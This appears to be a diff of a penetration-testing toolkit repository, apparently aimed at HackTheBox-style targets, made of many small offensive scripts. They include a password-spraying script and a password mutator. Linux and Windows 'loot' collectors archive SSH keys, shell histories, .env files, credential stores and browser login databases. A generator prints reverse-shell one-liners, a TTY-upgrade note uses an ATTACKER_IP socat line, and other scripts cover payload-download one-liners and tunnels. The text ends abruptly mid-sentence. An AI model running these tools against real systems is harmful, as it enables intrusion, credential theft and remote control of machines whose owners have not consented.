cat "$@" | tr -d '\r' | sed '/^\s*$/d' | sort -u

bin/passwords/mutate_words.py Executable file

@@ -0,0 +1,35 @@
#!/usr/bin/env python3
import sys

leet_map = str.maketrans({'a':'@','A':'@','e':'3','E':'3','i':'1','I':'1','o':'0','O':'0','s':'$','S':'$'})
years = ['2020','2021','2022','2023','2024','2025']
suffixes = ['', '!', '@', '#', '1', '123', '321']

def mutate(w):
    outs = set()
    bases = [w, w.capitalize(), w.upper()]
    for b in bases:
        outs.add(b)
        outs.add(b.translate(leet_map))
        for y in years:
            outs.add(b + y)
            outs.add(b.translate(leet_map) + y)
        for s in suffixes:
            outs.add(b + s)
    return outs

if len(sys.argv) < 2:
    print(f"Usage: {sys.argv[0]} word1 [word2 ...] | - (stdin)", file=sys.stderr)
    sys.exit(1)
words = sys.argv[1:]
if words == ['-']:
    words = [w.strip() for w in sys.stdin if w.strip()]
final = set()
for w in words:
    final |= mutate(w)
for v in sorted(final):
    print(v)
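A minimal standalone check of the mutation idea (a reduced leet map and a single seed word, for illustration):

```python
# Reduced sketch of mutate_words.py: leet substitution plus year/suffix variants.
leet = str.maketrans({'a': '@', 'e': '3', 'i': '1', 'o': '0', 's': '$'})
word = 'summer'
variants = {word, word.capitalize(), word.translate(leet), word + '2024', word + '!'}
print(sorted(variants))  # includes '$umm3r' among five distinct variants
```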


@@ -0,0 +1,25 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage: $(basename "$0") <url> <users.txt> <password>
Performs cautious HTTP Basic Auth spray (one pass).
USAGE
exit 1
}
url=${1:-}
users=${2:-}
pass=${3:-}
[[ -z "$url" || -z "$users" || -z "$pass" ]] && usage
while IFS= read -r u; do
[[ -z "$u" ]] && continue
code=$(curl -sk -o /dev/null -m 6 -w "%{http_code}" -u "$u:$pass" "$url" || true)
printf '%s\t%s\n' "$u" "$code"
sleep 1
done < "$users"
echo "[+] Note: Respect lockout policies. Use only with authorization."


@@ -0,0 +1,8 @@
#!/usr/bin/env bash
set -euo pipefail
in=${1:-}
min=${2:-6}
max=${3:-64}
[[ -z "$in" ]] && { echo "Usage: $(basename "$0") <wordlist> [minlen] [maxlen]" >&2; exit 1; }
rg -N '^[\x20-\x7E]+$' "$in" | awk -v min="$min" -v max="$max" 'length($0)>=min && length($0)<=max' | sort -u

bin/post/linux_loot.sh Executable file

@@ -0,0 +1,81 @@
#!/usr/bin/env bash
set -euo pipefail
# Safe, targeted loot collection for Linux. Default is conservative.
# Config via env:
# LOOT_DIR (default: ./loot)
# MAX_SIZE (default: 20971520 bytes = 20MB)
# INCLUDE_HIST (default: 1)
# INCLUDE_KEYS (default: 1)
# INCLUDE_CONFIGS (default: 1)
# INCLUDE_DB (default: 0)
# EXTRA_GLOBS (space-separated, optional)
LOOT_DIR=${LOOT_DIR:-loot}
MAX_SIZE=${MAX_SIZE:-20971520}
INCLUDE_HIST=${INCLUDE_HIST:-1}
INCLUDE_KEYS=${INCLUDE_KEYS:-1}
INCLUDE_CONFIGS=${INCLUDE_CONFIGS:-1}
INCLUDE_DB=${INCLUDE_DB:-0}
EXTRA_GLOBS=${EXTRA_GLOBS:-}
mkdir -p "$LOOT_DIR/listings" "$LOOT_DIR/files"
echo "[+] Collecting system summaries"
{
echo "# uname"; uname -a
echo "# os-release"; cat /etc/os-release 2>/dev/null || true
echo "# id"; id
echo "# users"; cat /etc/passwd | cut -d: -f1,3,4
echo "# sudo -n -l"; sudo -n -l 2>&1 || true
echo "# net"; ss -tunlp 2>/dev/null || netstat -tunlp 2>/dev/null || true
} > "$LOOT_DIR/listings/summary.txt"
collect_list() {
pat="$1"; hint="$2"
echo "[+] Searching: $hint ($pat)"
# List matching paths directly; rg needs --files here, otherwise the trailing
# "/" would be treated as the search pattern.
rg --files --hidden --no-ignore -g '!proc/**' -g '!sys/**' -g '!dev/**' -g '!run/**' -g '!var/log/**' -g "$pat" / 2>/dev/null | sort -u
}
to_pack=$(mktemp)
trap 'rm -f "$to_pack"' EXIT
if [[ "$INCLUDE_HIST" == "1" ]]; then
collect_list "**/.bash_history" "history" >> "$to_pack"
collect_list "**/.zsh_history" "history" >> "$to_pack"
fi
if [[ "$INCLUDE_KEYS" == "1" ]]; then
collect_list "**/.ssh/id_*" "ssh keys" >> "$to_pack"
collect_list "**/authorized_keys" "authorized_keys" >> "$to_pack"
fi
if [[ "$INCLUDE_CONFIGS" == "1" ]]; then
collect_list "**/*.conf" "configs" >> "$to_pack"
collect_list "**/.env" ".env" >> "$to_pack"
collect_list "**/*config*.php" "php configs" >> "$to_pack"
fi
if [[ "$INCLUDE_DB" == "1" ]]; then
collect_list "**/*.db" "sqlite db" >> "$to_pack"
collect_list "**/*.sqlite*" "sqlite db" >> "$to_pack"
collect_list "**/*.sql" "sql dumps" >> "$to_pack"
fi
for g in $EXTRA_GLOBS; do
collect_list "$g" "extra" >> "$to_pack"
done
echo "[+] Filtering paths; max size: $MAX_SIZE"
final=$(mktemp)
while IFS= read -r f; do
[[ -f "$f" ]] || continue
s=$(stat -c %s "$f" 2>/dev/null || stat -f %z "$f" 2>/dev/null || echo 0)
if [[ "$s" -le "$MAX_SIZE" ]]; then
echo "$f" >> "$final"
fi
done < <(sort -u "$to_pack")
tar -czf "$LOOT_DIR/files/linux_loot.tgz" -T "$final" 2>/dev/null || true
echo "[+] Loot archived: $LOOT_DIR/files/linux_loot.tgz"

bin/post/pack_report.sh Executable file

@@ -0,0 +1,36 @@
#!/usr/bin/env bash
set -euo pipefail
target=${1:-${TARGET:-}}
[[ -z "$target" ]] && { echo "Usage: $(basename "$0") <target> (or set TARGET)" >&2; exit 1; }
root=${HTB_ROOT:-$PWD}
troot="$root/targets/$target"
lootdir="$troot/loot"
scandir="$troot/scans"
notes="$troot/notes.md"
report="$troot/report_${target}_$(date +%Y%m%d_%H%M%S).md"
mkdir -p "$lootdir"
echo "[+] Generating report: $report"
{
echo "# Post-Exploitation Report — $target"
echo
echo "Generated: $(date)"
echo
echo "## Summaries"
if [[ -f "$lootdir/summary.txt" ]]; then
echo
echo "### System Summary"
sed -n '1,120p' "$lootdir/summary.txt"
fi
if compgen -G "$scandir/auto_recon_*.summary.txt" >/dev/null; then
echo
echo "### Recon Summary"
tail -n +1 "$scandir"/*summary.txt 2>/dev/null | sed 's/^/ /'
fi
echo
echo "## Loot Artifacts"
ls -lh "$lootdir" 2>/dev/null | sed 's/^/ /'
echo
echo "## Scan Artifacts"
ls -1 "$scandir" 2>/dev/null | sed 's/^/ /'
echo
echo "## Notes"
if [[ -f "$notes" ]]; then
sed -n '1,200p' "$notes" | sed 's/^/ /'
else
echo " (no notes.md found)"
fi
} > "$report"
echo "[+] Report saved: $report"

bin/post/windows_loot.ps1 Normal file

@@ -0,0 +1,59 @@
# Safe, targeted loot collection for Windows. Conservative defaults.
# Env-like params via variables at top; modify as needed.
$LootDir = $(Join-Path (Get-Location) 'loot')
$MaxSize = 20971520 # 20 MB
$IncludeBrowser = $true
$IncludeCreds = $true
$IncludeSSH = $true
New-Item -Force -ItemType Directory -Path $LootDir | Out-Null
New-Item -Force -ItemType Directory -Path (Join-Path $LootDir 'files') | Out-Null
"[+] Collecting system summary" | Out-Host
Get-ComputerInfo | Out-File (Join-Path $LootDir 'summary.txt')
$files = New-Object System.Collections.ArrayList
function Add-IfSmall($path) {
if (Test-Path $path) {
$fi = Get-Item $path -ErrorAction SilentlyContinue
if ($fi -and $fi.Length -le $MaxSize) { [void]$files.Add($fi.FullName) }
}
}
# Common artifacts
$UserProfile = $env:USERPROFILE
Add-IfSmall "$UserProfile\.ssh\id_rsa"
Add-IfSmall "$UserProfile\.ssh\id_ed25519"
Add-IfSmall "$UserProfile\.ssh\known_hosts"
Add-IfSmall "$UserProfile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
Add-IfSmall "$UserProfile\AppData\Roaming\Code\User\settings.json"
if ($IncludeCreds) {
Add-IfSmall "$UserProfile\AppData\Roaming\Microsoft\Credentials"
Add-IfSmall "$UserProfile\AppData\Local\Microsoft\Credentials"
}
if ($IncludeBrowser) {
Add-IfSmall "$UserProfile\AppData\Local\Google\Chrome\User Data\Default\Login Data"
Add-IfSmall "$UserProfile\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data"
Add-IfSmall "$UserProfile\AppData\Roaming\Mozilla\Firefox\Profiles"
}
}
# Write file list
$listPath = Join-Path $LootDir 'filelist.txt'
$files | Sort-Object -Unique | Out-File $listPath
"[+] Files listed in $listPath" | Out-Host
"[+] Zip archive: $LootDir\windows_loot.zip" | Out-Host
# Create archive
try {
Compress-Archive -Path (Get-Content $listPath) -DestinationPath (Join-Path $LootDir 'windows_loot.zip') -Force
} catch {
Write-Warning "Compress-Archive failed. Copying individual files."
foreach ($f in Get-Content $listPath) {
try { Copy-Item -Force -Path $f -Destination (Join-Path $LootDir 'files') } catch {}
}
}

bin/privesc/caps_scan.sh Executable file

@@ -0,0 +1,11 @@
#!/usr/bin/env bash
set -euo pipefail
if ! command -v getcap >/dev/null 2>&1; then
echo "[!] getcap not found. On Debian/Ubuntu: apt install libcap2-bin" >&2
exit 1
fi
echo "[+] File capabilities"
getcap -r / 2>/dev/null | sort

bin/privesc/linux_quick_enum.sh Executable file

@@ -0,0 +1,50 @@
#!/usr/bin/env bash
set -euo pipefail
echo "[+] Hostname / kernel / distro"
hostname || true
uname -a || true
cat /etc/os-release 2>/dev/null || true
echo
echo "[+] Users and groups"
id || true
whoami || true
cat /etc/passwd 2>/dev/null | cut -d: -f1,3,4 | head -n 5 || true
groups 2>/dev/null || true
echo
echo "[+] Sudo (non-interactive)"
sudo -n -l 2>&1 || echo "sudo -n -l failed (needs password?)"
echo
echo "[+] Env / PATH / umask"
printf 'PATH=%s\n' "$PATH"
umask || true
env | sort | head -n 20
echo
echo "[+] Cron jobs"
ls -la /etc/cron* 2>/dev/null || true
crontab -l 2>/dev/null || true
echo
echo "[+] Network"
ip a 2>/dev/null || ifconfig 2>/dev/null || true
ip r 2>/dev/null || route -n 2>/dev/null || true
ss -tunlp 2>/dev/null || netstat -tunlp 2>/dev/null || true
echo
echo "[+] Processes"
ps aux --sort=-%mem | head -n 15
echo
echo "[+] Interesting files (writable / root owned / backups)"
find / -type f \( -name "*.bak" -o -name "*.old" -o -name "*.orig" \) 2>/dev/null | head -n 50
find / -writable -type f -maxdepth 3 -not -path "/proc/*" 2>/dev/null | head -n 50
echo
echo "[+] SUID/SGID & Capabilities"
find / -perm -4000 -type f -not -path "/proc/*" -ls 2>/dev/null | head -n 50
command -v getcap >/dev/null && getcap -r / 2>/dev/null | head -n 50 || true

bin/privesc/suid_scan.sh Executable file

@@ -0,0 +1,10 @@
#!/usr/bin/env bash
set -euo pipefail
echo "[+] SUID binaries"
find / -perm -4000 -type f -not -path "/proc/*" 2>/dev/null | sort
echo
echo "[+] SGID binaries"
find / -perm -2000 -type f -not -path "/proc/*" 2>/dev/null | sort

bin/pwn/pwntools_template.py Executable file

@@ -0,0 +1,32 @@
#!/usr/bin/env python3
import os
from pwn import *

context.update(arch='amd64', os='linux')
exe = context.binary = ELF('./vuln', checksec=False)

gdbscript = '''
init-peda
break main
continue
'''

def start(argv=[], *a, **kw):
    host = args.HOST or os.getenv('TARGET')
    port = int(args.PORT or 1337)
    if args.REMOTE and host:
        return remote(host, port)
    elif args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

def main():
    io = start()
    payload = b'A' * 64
    io.sendlineafter(b':', payload)
    io.interactive()

if __name__ == '__main__':
    main()

bin/scan/masscan_top.sh Executable file

@@ -0,0 +1,10 @@
#!/usr/bin/env bash
set -euo pipefail
target=${1:-${TARGET:-}}
rate=${2:-10000}
[[ -z "$target" ]] && { echo "Usage: $(basename "$0") <target> [rate] (requires masscan)" >&2; exit 1; }
if ! command -v masscan >/dev/null 2>&1; then
echo "[!] masscan not found." >&2; exit 2
fi
masscan "$target" --top-ports 1000 --rate "$rate" --wait 0

bin/scan/naabu_quick.sh Executable file

@@ -0,0 +1,10 @@
#!/usr/bin/env bash
set -euo pipefail
target=${1:-${TARGET:-}}
[[ -z "$target" ]] && { echo "Usage: $(basename "$0") <target> [flags...] (requires naabu)" >&2; exit 1; }
shift || true
if ! command -v naabu >/dev/null 2>&1; then
echo "[!] naabu not found." >&2; exit 2
fi
naabu -host "$target" -top-ports 1000 -rate 10000 "$@"

bin/shells/listener.sh Executable file

@@ -0,0 +1,22 @@
#!/usr/bin/env bash
set -euo pipefail
port=${1:-}
[[ -z "$port" ]] && { echo "Usage: $(basename "$0") <port>" >&2; exit 1; }
if command -v rlwrap >/dev/null 2>&1; then
if command -v ncat >/dev/null 2>&1; then
echo "[+] rlwrap ncat -lvnp $port"
exec rlwrap ncat -lvnp "$port"
else
echo "[+] rlwrap nc -lvnp $port"
exec rlwrap nc -lvnp "$port"
fi
else
if command -v ncat >/dev/null 2>&1; then
exec ncat -lvnp "$port"
else
exec nc -lvnp "$port"
fi
fi

bin/shells/revsh.py Executable file

@@ -0,0 +1,32 @@
#!/usr/bin/env python3
import sys

def usage():
    print(f"Usage: {sys.argv[0]} <lhost> <lport>")
    sys.exit(1)

if len(sys.argv) < 3:
    usage()
ip = sys.argv[1]
port = sys.argv[2]
tpls = {
    'bash_tcp': f"bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'",
    'bash_udp': f"bash -c 'bash -i >& /dev/udp/{ip}/{port} 0>&1'",
    'nc_mkfifo': f"rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/f",
    'ncat': f"ncat {ip} {port} -e /bin/sh",
    'ncat_pty': f"ncat --ssl {ip} {port} -e /bin/bash",
    # Braces in the perl body must be doubled inside the f-string.
    'perl': f"perl -e 'use Socket;$i=\"{ip}\";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");}};'",
    'python3': f"python3 -c 'import os,pty,socket as s;h=\"{ip}\";p={port};c=s.socket();c.connect((h,p));[os.dup2(c.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/bash\")'",
    'php': f"php -r '$sock=fsockopen(\"{ip}\",{port});exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    'ruby': f"ruby -rsocket -e'f=TCPSocket.open(\"{ip}\",{port}).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'",
    'node': f"node -e 'var s=require(\"net\").Socket();s.connect({port},\"{ip}\",function(){{s.pipe(process.stdout);process.stdin.pipe(s);}});'",
    'powershell_tcp': f"powershell -NoP -W Hidden -Exec Bypass -Command \"$c=New-Object System.Net.Sockets.TCPClient(\'{ip}\',{port});$s=$c.GetStream();[byte[]]$b=0..65535|%{{0}};while(($i=$s.Read($b,0,$b.Length)) -ne 0){{;$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$sb=(iex $d 2>&1 | Out-String);$sb2=$sb+\'PS \'+(pwd).Path+\'> \';$sbBytes=([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbBytes,0,$sbBytes.Length);$s.Flush()}}\"",
    'socat_listener': f"socat -d -d TCP-LISTEN:{port},fork,reuseaddr FILE:`tty`,raw,echo=0",
    'socat_target': f"socat TCP:{ip}:{port} EXEC:/bin/bash,pty,stderr,setsid,sigint,sane",
}
for k, v in tpls.items():
    print(f"[{k}]\n{v}\n")

bin/shells/tty_upgrade.sh Executable file

@@ -0,0 +1,22 @@
#!/usr/bin/env bash
cat <<'TXT'
TTY upgrade tips:
Python:
python3 -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo; fg
stty rows 40 columns 120; export TERM=xterm
Script:
/usr/bin/script -qc /bin/bash /dev/null
Busybox:
busybox sh
Socat (on target):
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:PORT
Socat listener (attacker):
socat -d -d TCP-LISTEN:PORT,reuseaddr,fork FILE:`tty`,raw,echo=0
TXT

bin/smb/enum4linux_ng.sh Executable file

@@ -0,0 +1,10 @@
#!/usr/bin/env bash
set -euo pipefail
host=${1:-${TARGET:-}}
[[ -z "$host" ]] && { echo "Usage: $(basename "$0") <host> [args...]" >&2; exit 1; }
shift || true
if ! command -v enum4linux-ng >/dev/null 2>&1; then
echo "[!] enum4linux-ng not found." >&2; exit 2
fi
exec enum4linux-ng -A "$host" "$@"

bin/smb/smb_check_write.sh Executable file

@@ -0,0 +1,25 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){ echo "Usage: $(basename "$0") <host> <share> [user] [pass]" >&2; exit 1; }
host=${1:-${TARGET:-}}
share=${2:-}
user=${3:-}
pass=${4:-}
[[ -z "$host" || -z "$share" ]] && usage
tmpfile=".writetest_$(date +%s).txt"
echo test > "$tmpfile"
trap 'rm -f "$tmpfile" >/dev/null 2>&1 || true' EXIT
if command -v smbclient >/dev/null 2>&1; then
if [[ -n "$user" ]]; then
if smbclient -U "$user%$pass" "//$host/$share" -c "put $tmpfile; rm $tmpfile" >/dev/null 2>&1; then
echo "[+] Writable via smbclient"
exit 0
fi
else
if smbclient -N "//$host/$share" -c "put $tmpfile; rm $tmpfile" >/dev/null 2>&1; then
echo "[+] Writable via smbclient (anon)"
exit 0
fi
fi
fi
echo "[-] Could not confirm write access"
exit 1

bin/smb/smbmap_quick.sh Executable file

@@ -0,0 +1,13 @@
#!/usr/bin/env bash
set -euo pipefail
host=${1:-${TARGET:-}}
user=${2:-}
pass=${3:-}
[[ -z "$host" ]] && { echo "Usage: $(basename "$0") <host> [user] [pass]" >&2; exit 1; }
if ! command -v smbmap >/dev/null 2>&1; then echo "[!] smbmap not found" >&2; exit 2; fi
if [[ -n "$user" ]]; then
exec smbmap -H "$host" -u "$user" -p "$pass"
else
exec smbmap -H "$host" -u '' -p ''
fi

bin/smb_enum.sh Executable file

@@ -0,0 +1,40 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage: $(basename "$0") <ip> [user] [pass]
- Anonymous or credentialed SMB quick enumeration.
USAGE
exit 1
}
ip=${1:-${TARGET:-}}
user=${2:-}
pass=${3:-}
[[ -z "$ip" ]] && usage
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
base="$outdir/${ip//\//_}_smb_${ts}"
echo "[+] SMB nmap scripts"
nmap -Pn -p 139,445 --script smb-protocols,smb2-security-mode,smb2-time,smb2-capabilities,smb-security-mode -oN "$base.nmap" "$ip" || true
if [[ -z "$user" ]]; then
echo "[+] smbclient -N -L //$ip"
(smbclient -N -L "//$ip" || true) | tee "$base.smbclient.list"
else
echo "[+] smbclient -L //$ip -U $user%<hidden>"
(smbclient -L "//$ip" -U "$user%$pass" || true) | tee "$base.smbclient.list"
fi
echo "[+] Attempting anonymous share listing"
awk '/Disk/{print $1}' "$base.smbclient.list" | grep -vE '^-|Printer|IPC\$' | while read -r share; do
echo "--- Listing //$ip/$share (anon) ---" | tee -a "$base.shares.txt"
(echo -e "recurse ON\nls\nexit\n" | smbclient -N "//$ip/$share" || true) | tee -a "$base.shares.txt"
done
echo "[+] Saved outputs under $base.*"

bin/snmp_enum.sh Executable file

@@ -0,0 +1,22 @@
#!/usr/bin/env bash
set -euo pipefail
ip=${1:-${TARGET:-}}
community=${2:-public}
[[ -z "$ip" ]] && { echo "Usage: $(basename "$0") <ip> [community]" >&2; exit 1; }
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
base="$outdir/${ip//\//_}_snmp_${ts}"
echo "[+] SNMP sysDescr"
snmpwalk -v2c -c "$community" "$ip" 1.3.6.1.2.1.1 2>/dev/null | tee "$base.sysdescr.txt" || true
echo "[+] SNMP Users, Processes, TCP/UDP (if allowed)"
snmpwalk -v2c -c "$community" "$ip" 1.3.6.1.2.1.25 2>/dev/null | tee "$base.hostresources.txt" || true
snmpwalk -v2c -c "$community" "$ip" 1.3.6.1.2.1.6 2>/dev/null | tee "$base.tcp.txt" || true
snmpwalk -v2c -c "$community" "$ip" 1.3.6.1.2.1.7 2>/dev/null | tee "$base.udp.txt" || true
echo "[+] Saved outputs under $base.*"

bin/transfer/dl_oneshots.sh Executable file

@@ -0,0 +1,40 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage: $(basename "$0") <lhost> <port> <filename>
Print common one-liners to download http://<lhost>:<port>/<filename>.
USAGE
exit 1
}
host=${1:-}
port=${2:-}
file=${3:-}
[[ -z "$host" || -z "$port" || -z "$file" ]] && usage
url="http://$host:$port/$file"
cat <<TXT
Linux wget:
wget -qO $file "$url"
Linux curl:
curl -fsSL "$url" -o $file
BusyBox wget:
busybox wget -O $file "$url"
Powershell (WebClient):
powershell -c "\$wc=new-object system.net.webclient;\$wc.downloadfile('$url','$file')"
Powershell (Invoke-WebRequest):
powershell -c "iwr -uri '$url' -outfile '$file'"
certutil:
certutil -urlcache -split -f "$url" $file
bitsadmin:
bitsadmin /transfer job /download /priority normal "$url" "$file"
TXT

bin/transfer/http_serve.sh Executable file

@@ -0,0 +1,7 @@
#!/usr/bin/env bash
set -euo pipefail
port=${1:-8000}
echo "[+] python3 -m http.server $port (Ctrl+C to stop)"
python3 -m http.server "$port"

bin/transfer/push_http.sh Executable file

@@ -0,0 +1,10 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){ echo "Usage: $(basename "$0") <file> <http://host:port/upload>" >&2; exit 1; }
file=${1:-}
url=${2:-}
[[ -z "$file" || -z "$url" ]] && usage
curl -fsS -F "file=@${file}" "$url"

bin/transfer/serve.py Executable file

@@ -0,0 +1,60 @@
#!/usr/bin/env python3
# Note: the cgi module was removed in Python 3.13; this requires <= 3.12.
import http.server, socketserver, os, cgi, sys, html, urllib.parse

PORT = int(os.environ.get('PORT', sys.argv[1] if len(sys.argv) > 1 else 8000))
UPLOAD_DIR = os.environ.get('UPLOAD_DIR', '.')

FORM = (
    "<hr><h3>Upload</h3>"
    "<form ENCTYPE='multipart/form-data' method='post' action='/upload'>"
    "<input name='file' type='file'/>"
    "<input type='submit' value='upload'/></form>"
)

class Handler(http.server.SimpleHTTPRequestHandler):
    def list_directory(self, path):
        # Build the listing ourselves so the upload form can be appended before
        # any headers go out (the stock implementation sends headers itself,
        # so its output cannot be post-processed safely).
        try:
            entries = sorted(os.listdir(path), key=str.lower)
        except OSError:
            self.send_error(404, "No permission to list directory")
            return None
        items = []
        for name in entries:
            display = name + ('/' if os.path.isdir(os.path.join(path, name)) else '')
            items.append('<li><a href="%s">%s</a></li>' % (
                urllib.parse.quote(display), html.escape(display)))
        body = ('<!DOCTYPE html><html><head><meta charset="utf-8">'
                '<title>Directory listing</title></head><body>'
                '<h2>Directory listing</h2><ul>%s</ul>%s</body></html>'
                % (''.join(items), FORM))
        encoded = body.encode('utf-8')
        self.send_response(200)
        self.send_header("Content-type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(encoded)))
        self.end_headers()
        self.wfile.write(encoded)
        return None

    def do_POST(self):
        if self.path != '/upload':
            self.send_error(404, "Unknown endpoint")
            return
        form = cgi.FieldStorage(
            fp=self.rfile,
            headers=self.headers,
            environ={'REQUEST_METHOD': 'POST', 'CONTENT_TYPE': self.headers['Content-Type']}
        )
        if 'file' not in form:
            self.send_error(400, "No file field")
            return
        field = form['file']
        filename = os.path.basename(field.filename) if field.filename else 'upload.bin'
        dest = os.path.join(UPLOAD_DIR, filename)
        with open(dest, 'wb') as f:
            data = field.file.read()
            f.write(data)
        self.send_response(200)
        self.end_headers()
        self.wfile.write(f"Uploaded {filename} ({len(data)} bytes)\n".encode())

if __name__ == '__main__':
    with socketserver.TCPServer(("0.0.0.0", PORT), Handler) as httpd:
        print(f"[*] Serving HTTP on 0.0.0.0:{PORT}, upload dir: {UPLOAD_DIR}")
        try:
            httpd.serve_forever()
        except KeyboardInterrupt:
            pass

bin/transfer/smb_server.sh Executable file

@@ -0,0 +1,15 @@
#!/usr/bin/env bash
set -euo pipefail
share=${1:-share}
path=${2:-.}
[[ ! -d "$path" ]] && { echo "Usage: $(basename "$0") [share] [path]" >&2; exit 1; }
if ! command -v impacket-smbserver >/dev/null 2>&1; then
echo "[!] impacket-smbserver not found. Install impacket." >&2
exit 2
fi
echo "[+] Serving SMB share '$share' from $path"
exec impacket-smbserver "$share" "$path" -smb2support

bin/tunnel/autossh_socks.sh Executable file

@@ -0,0 +1,8 @@
#!/usr/bin/env bash
set -euo pipefail
host=${1:-}
port=${2:-1080}
[[ -z "$host" ]] && { echo "Usage: $(basename "$0") <user@host> [local_socks_port]" >&2; exit 1; }
if ! command -v autossh >/dev/null 2>&1; then echo "[!] autossh not found" >&2; exit 2; fi
exec autossh -M 0 -N -D "$port" "$host"

bin/tunnel/chisel_client.sh Executable file

@@ -0,0 +1,19 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage:
$(basename "$0") <server_host:port> R:<lport>:<rhost>:<rport> [R:...]
Example:
$(basename "$0") 10.10.14.1:8000 R:8080:127.0.0.1:80
USAGE
exit 1
}
server=${1:-}
[[ -z "$server" || -z ${2:-} ]] && usage
shift
if ! command -v chisel >/dev/null 2>&1; then echo "[!] chisel not found" >&2; exit 2; fi
exec chisel client "$server" "$@"

bin/tunnel/chisel_server.sh Executable file

@@ -0,0 +1,7 @@
#!/usr/bin/env bash
set -euo pipefail
port=${1:-8000}
[[ -z "$port" ]] && { echo "Usage: $(basename "$0") <port> (requires chisel)" >&2; exit 1; }
if ! command -v chisel >/dev/null 2>&1; then echo "[!] chisel not found" >&2; exit 2; fi
exec chisel server --reverse -p "$port"

bin/tunnel/socat_forward.sh Executable file

@@ -0,0 +1,28 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage:
Forward local -> remote: $(basename "$0") -L <lport> <rhost> <rport>
Reverse remote -> local: $(basename "$0") -R <lport> <rhost> <rport>
Examples:
# On attacker, listen and connect from target (reverse):
$(basename "$0") -R 4444 127.0.0.1 80
USAGE
exit 1
}
[[ $# -lt 4 ]] && usage
mode=$1; lport=$2; rhost=$3; rport=$4
if [[ "$mode" == "-L" ]]; then
echo "[+] socat -d -d TCP-LISTEN:$lport,reuseaddr,fork TCP:$rhost:$rport"
exec socat -d -d TCP-LISTEN:"$lport",reuseaddr,fork TCP:"$rhost":"$rport"
elif [[ "$mode" == "-R" ]]; then
echo "[+] Reverse: connect to attacker and forward to $rhost:$rport"
echo " On attacker: socat -d -d TCP-LISTEN:$lport,reuseaddr,fork TCP:$rhost:$rport"
else
usage
fi

bin/web/backup_hunter.sh Executable file

@@ -0,0 +1,21 @@
#!/usr/bin/env bash
set -euo pipefail
base=${1:-}
[[ -z "$base" ]] && { echo "Usage: $(basename "$0") <base-url> [list-of-paths.txt]" >&2; exit 1; }
list=${2:-}
paths=(index.php index.html config.php config.php~ config.php.bak .env .env.bak .git/HEAD .svn/entries backup.zip backup.tar.gz db.sql db.sql.gz site.zip wp-config.php wp-config.php~ robots.txt)
if [[ -n "$list" && -f "$list" ]]; then
mapfile -t extra < "$list"; paths+=("${extra[@]}")
fi
for p in "${paths[@]}"; do
url="${base%/}/$p"
code=$(curl -sk -o /dev/null -m 6 -w "%{http_code}" "$url" || true)
if [[ "$code" != "404" && "$code" != "000" ]]; then
size=$(curl -skI "$url" | awk -F': ' 'tolower($1)=="content-length"{print $2}' | tr -d '\r')
echo -e "[+] $code\t$size\t$url"
fi
done

bin/web/clone_site.sh Executable file

@@ -0,0 +1,8 @@
#!/usr/bin/env bash
set -euo pipefail
url=${1:-}
out=${2:-site_mirror}
[[ -z "$url" ]] && { echo "Usage: $(basename "$0") <url> [outdir]" >&2; exit 1; }
wget --mirror --convert-links --adjust-extension --page-requisites --no-parent -P "$out" "$url"
echo "[+] Mirror saved under $out"

bin/web/confluence_quick.sh Executable file

@@ -0,0 +1,9 @@
#!/usr/bin/env bash
set -euo pipefail
url=${1:-}
[[ -z "$url" ]] && { echo "Usage: $(basename "$0") <confluence-url>" >&2; exit 1; }
echo "[+] Confluence quick checks for $url"
curl -sk "$url/rest/api/content?limit=1" | sed 's/.*/[api] &/' || true
curl -sk "$url/login.action" | head -c 200 | sed 's/.*/[login] &/' || true
curl -sk -I "$url/" | sed -n '1,20p' | sed 's/.*/[hdr] &/' || true

bin/web/cors_tester.py Executable file

@@ -0,0 +1,25 @@
#!/usr/bin/env python3
import sys, requests
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <url> [origin]", file=sys.stderr)
sys.exit(1)
url = sys.argv[1]
origin = sys.argv[2] if len(sys.argv) > 2 else 'https://evil.example'
try:
r = requests.get(url, headers={'Origin': origin}, timeout=8, verify=False)
acao = r.headers.get('Access-Control-Allow-Origin', '')
acac = r.headers.get('Access-Control-Allow-Credentials', '')
print(f"Origin: {origin}")
print(f"Status: {r.status_code}")
print(f"Access-Control-Allow-Origin: {acao}")
print(f"Access-Control-Allow-Credentials: {acac}")
if acao == '*' and acac.lower() == 'true':
print('[!] Potentially dangerous: ACAO=* with credentials allowed')
elif acao == origin:
print('[+] Reflection of Origin detected')
except Exception as e:
print(f"[!] Error: {e}", file=sys.stderr)
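The two alert branches above reduce to a small predicate: wildcard origin combined with credentials, or the attacker-supplied Origin echoed back verbatim. A hedged standalone sketch (the `classify_cors` name is ours, using an exact-match reflection test):

```python
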